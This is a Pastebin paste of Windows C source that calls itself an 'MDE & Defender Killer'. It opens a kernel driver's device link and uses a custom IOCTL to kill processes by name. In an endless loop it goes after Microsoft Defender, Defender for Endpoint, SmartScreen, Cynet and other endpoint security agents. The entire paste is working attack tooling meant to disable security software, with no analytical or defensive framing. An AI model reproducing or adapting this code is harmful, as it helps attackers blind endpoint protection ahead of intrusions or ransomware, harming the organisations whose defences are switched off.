API tools faq
paste
s44d47l4

Untitled

s44d47l4
Jul 22nd, 2025
564
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.21 KB | None | 0 0
raw download clone embed print report
  1. #include <Windows.h>
  2. #include <TlHelp32.h>
  3. #include <stdio.h>
  4. #include <string.h>
  5.  
  6. #define IOCTL_CODE 0x82730030  // IOCTL to terminate process
  7. #define DEVICE_PATH L"\\\\.\\viragtlt"  // Symbolic link to the driver
  8.  
  9. // Structure sent to the driver
  10. struct ProcNameStruct {
  11.     char procName[500];
  12. };
  13.  
  14. // Function to convert wchar_t* to char*
  15. void WideCharToChar(const wchar_t* wStr, char* cStr, size_t size) {
  16.     size_t converted;
  17.     wcstombs_s(&converted, cStr, size, wStr, _TRUNCATE);
  18. }
  19.  
  20. // Function to find process by name and get PID
  21. DWORD GetProcessIdByName(const wchar_t* processName) {
  22.     DWORD processId = 0;
  23.     HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  24.  
  25.     if (hSnapshot == INVALID_HANDLE_VALUE) {
  26.         wprintf(L"[-] Failed to create snapshot. Error: %d\n", GetLastError());
  27.         return 0;
  28.     }
  29.  
  30.     PROCESSENTRY32 pe32;
  31.     pe32.dwSize = sizeof(PROCESSENTRY32);
  32.  
  33.     // Iterate through processes to find target
  34.     if (Process32First(hSnapshot, &pe32)) {
  35.         do {
  36.             if (_wcsicmp(pe32.szExeFile, processName) == 0) {
  37.                 processId = pe32.th32ProcessID;
  38.                 break;
  39.             }
  40.         } while (Process32Next(hSnapshot, &pe32));
  41.     }
  42.  
  43.     CloseHandle(hSnapshot);
  44.     return processId;
  45. }
  46.  
  47. // Function to send IOCTL to driver to kill process
  48. int KillProcessByName(HANDLE hDevice, const wchar_t* processName) {
  49.     struct ProcNameStruct ioctlData;
  50.     ZeroMemory(&ioctlData, sizeof(ioctlData));
  51.  
  52.     // Convert wide string to narrow string
  53.     WideCharToChar(processName, ioctlData.procName, sizeof(ioctlData.procName) - 1);
  54.     ioctlData.procName[sizeof(ioctlData.procName) - 1] = '\0';
  55.  
  56.     DWORD bytesReturned = 0;
  57.     BOOL result = DeviceIoControl(
  58.         hDevice,
  59.         IOCTL_CODE,
  60.         &ioctlData,
  61.         sizeof(ioctlData),
  62.         NULL,
  63.         0,
  64.         &bytesReturned,
  65.         NULL
  66.     );
  67.  
  68.     if (!result) {
  69.         printf("[-] Failed to send IOCTL to kill %s. Error: %d\n", ioctlData.procName, GetLastError());
  70.         return 0;
  71.     }
  72.  
  73.     printf("[+] Successfully sent IOCTL to kill %s.\n", ioctlData.procName);
  74.     return 1;
  75. }
  76.  
  77. // Main loop to terminate Defender and MDE processes
  78. int main() {
  79.     wprintf(L"[+] Starting MDE & Defender Killer...\n");
  80.  
  81.     // Open handle to the driver
  82.     HANDLE hDevice = CreateFileW(
  83.         DEVICE_PATH,
  84.         GENERIC_READ | GENERIC_WRITE,
  85.         0,
  86.         NULL,
  87.         OPEN_EXISTING,
  88.         FILE_ATTRIBUTE_NORMAL,
  89.         NULL
  90.     );
  91.  
  92.     if (hDevice == INVALID_HANDLE_VALUE) {
  93.         wprintf(L"[-] Failed to open handle to %s. Error: %d\n", DEVICE_PATH, GetLastError());
  94.         return 1;
  95.     }
  96.     wprintf(L"[+] Successfully opened handle to driver.\n");
  97.  
  98.     // Target processes to terminate
  99.     const wchar_t* targetProcesses[] = { L"MsMpEng.exe", L"CynetMS.exe", L"smartscreen.exe", L"SenseTVM.exe",
  100.         L"SenseNdr.exe", L"SenseIR.exe", L"NisSrv.exe", L"CynetEPS.exe", L"CybergON-Kronk-signed.exe",
  101.         L"elmecagent-updater.exe", L"elmecagent-watchdog.exe"};
  102.    
  103.     int numProcesses = sizeof(targetProcesses) / sizeof(targetProcesses[0]);
  104.  
  105.     // Infinite loop to continuously check and kill the processes
  106.     while (1) {
  107.         int foundProcess = 0;
  108.  
  109.         // Loop over all target processes
  110.         for (int i = 0; i < numProcesses; ++i) {
  111.             const wchar_t* target = targetProcesses[i];
  112.             DWORD pid = GetProcessIdByName(target);
  113.  
  114.             if (pid != 0) {
  115.                 wprintf(L"[+] Found %s with PID: %d\n", target, pid);
  116.                 if (KillProcessByName(hDevice, target)) {
  117.                     wprintf(L"[+] Successfully terminated %s.\n", target);
  118.                 }
  119.                 else {
  120.                     wprintf(L"[-] Failed to terminate %s.\n", target);
  121.                 }
  122.                 foundProcess = 1;
  123.             }
  124.             else {
  125.                 wprintf(L"[-] %s not found.\n", target);
  126.             }
  127.         }
  128.  
  129.         if (!foundProcess) {
  130.             wprintf(L"[*] No target processes found. Sleeping for 5 seconds...\n");
  131.         }
  132.  
  133.         // Sleep for 5 seconds before checking again
  134.         Sleep(5000);
  135.     }
  136.  
  137.     CloseHandle(hDevice);
  138.     return 0;
  139. }
  140.  
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!